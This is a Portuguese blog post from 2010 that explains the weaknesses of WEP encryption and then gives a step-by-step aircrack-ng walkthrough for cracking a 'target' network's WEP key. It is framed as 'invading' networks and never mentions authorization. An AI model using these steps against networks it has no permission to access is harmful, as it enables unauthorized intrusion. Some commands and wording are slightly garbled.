Paginas

Subscribe:

segunda-feira, 25 de outubro de 2010

INVADINDO REDE SEM FIOS

Backtrack 4 - Fazendo Pentesting em WEP em 3 minutos e porque é tão insegura a WEP.

Mas porque redes com criptografia WEP são tão vulneráveis?

Após vários estudos e testes realizados com este protocolo, encontraram-se algumas vulnerabilidades e falhas que fizeram com que o WEP perdesse quase toda a sua credibilidade.

No WEP, os dois parâmetros que servem de entrada para o algoritmo RC4 são a chave secreta k de 40 bits ou 104 bits e um vector de inicialização de 24 bits. A partir desses dois parâmetros, o algoritmo gera uma seqüência criptografada RC4 (k,v).

Porém, como no WEP a chave secreta que é a mesma utilizada por todos os usuários de uma mesma rede, onde devemos ter um vetor de inicialização diferente para cada pacote a fim de evitar a repetição de uma mesma seqüência RC4 . Essa repetição de seqüência é extremamente indesejável pois dá margem a ataques bem sucedidos e conseqüente descoberta de pacotes por eventuais intrusos.

Além disso, há também uma forte recomendação para que seja feita a troca das chaves secretas periodicamente aumentando-se com isso a segurança da rede. Porém, essa troca quando é feita, é realizada manualmente de maneira pouco prática e por vezes inviável, quando se trata de redes com um número muito alto de usuários.

E ainda uma falha do WEP constatada e provada através de ataques bem sucedidos é a natureza de sua função detectora de erros. A CRC-32 é uma função linear e que não possui chave. Essas duas características tornam o protocolo suscetível a dois tipos de ataques prejudiciais e indesejáveis: é possível fazer uma modificação de mensagens que eventualmente tenham sido capturadas no meio do caminho sem que isso seja descoberto pelo receptor final devido a linearidade da função detectora de erros(MITM Man The Of Middle - O homem do meio), e além disso, pelo fato da função não possuir uma chave, é também possível descobrir uma seqüência secreta RC4 e de posse desta ser autenticado na rede e introduzir mensagens clandestinas nesta (Injeção de Pacotes).

Passo a Passo:

Instruções que são colocados dentro de aspas e com MAIUSCULAS exigem que você substitua com dados reais

1. Faça o Download do BackTrack 4 e grave em DVD

2. Dê Boot com BackTrack 4 e inicie a GUI digitando “startx”

3. Abra um “Konsole” e digite “airmon-ng”, lembre-se da sua interface de rede wireless (geralmente wlan0)

4. Digite “airodump-ng INTERFACE”

5. Será mostrado abaixo seu BSSID, ESSID, e channel da rede alvo.

6. Digite “airodump-ng -w wep -c CHANNEL –bssid BSSID INTERFACE”

7. Abra um novo console “Konsole” e digite "aireplay-ng -1 0 -a BSSID INTERFACE”

8. Abra um novo console “Konsole” e digite "aireplay-ng -3 -b BSSID INTERFACE”

9. Aguarde até as informações chegarem próximo (mais ou menos) até 30000.

10. Digite “aircrack-ng wep-01.cap INTERFACE”

Você terá conseguido o acesso a rede do seu alvo.

Uma das soluções que foi cogitada foi a substituição da CRC-32 por uma função de hash MD5 ou SHA-1 por exemplo. No entanto, esta seria uma solução muito cara além do que, tornaria a execução do protocolo pelos atuais processadores muito lenta.

Uma outra solução discutida foi descartar os primeiros 256 bytes da saída do gerador de números pseudo-aleatórios utilizado na criação dos vetores de inicialização. Isso seria feito devido a alta correlação dos primeiros bits exalados pelo RC4 com a chave. Porém, essa solução mostrou-se também muito cara e para muitas aplicações, inviável de ser implementada.

1 comentários:

Anônimo disse...

Cara vou testa aqui pra ver se da certo (H)

Postar um comentário